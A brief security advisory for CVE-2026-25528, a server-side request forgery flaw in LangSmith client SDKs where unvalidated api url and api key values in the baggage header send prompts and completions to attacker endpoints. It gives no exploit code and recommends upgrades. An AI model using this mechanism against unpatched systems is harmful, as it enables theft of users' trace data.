CVE-2026-25528

Name of the Vulnerable Software and Affected Versions LangSmith Client SDKs versions prior to 0.6.3 LangSmith Client SDKs versions prior to 0.4.6

Description The LangSmith SDK’s distributed tracing feature is susceptible to Server-Side Request Forgery (SSRF) through manipulation of HTTP headers. An attacker can inject arbitrary api url values via the baggage header, potentially causing the SDK to transmit sensitive trace data—including prompts and completions—to attacker-controlled endpoints. The SDK parses incoming HTTP headers using RunTree.from headers() in Python and RunTree.fromHeaders() in Typescript, accepting attacker-controlled values in the api url and api key fields within the baggage header without validation. Upon completion of a traced operation, the SDK’s post() and patch() methods transmit run data to all configured replica URLs, including those injected by an attacker.

Recommendations Update the Python SDK to version 0.6.3 or later. Update the JavaScript SDK to version 0.4.6 or later.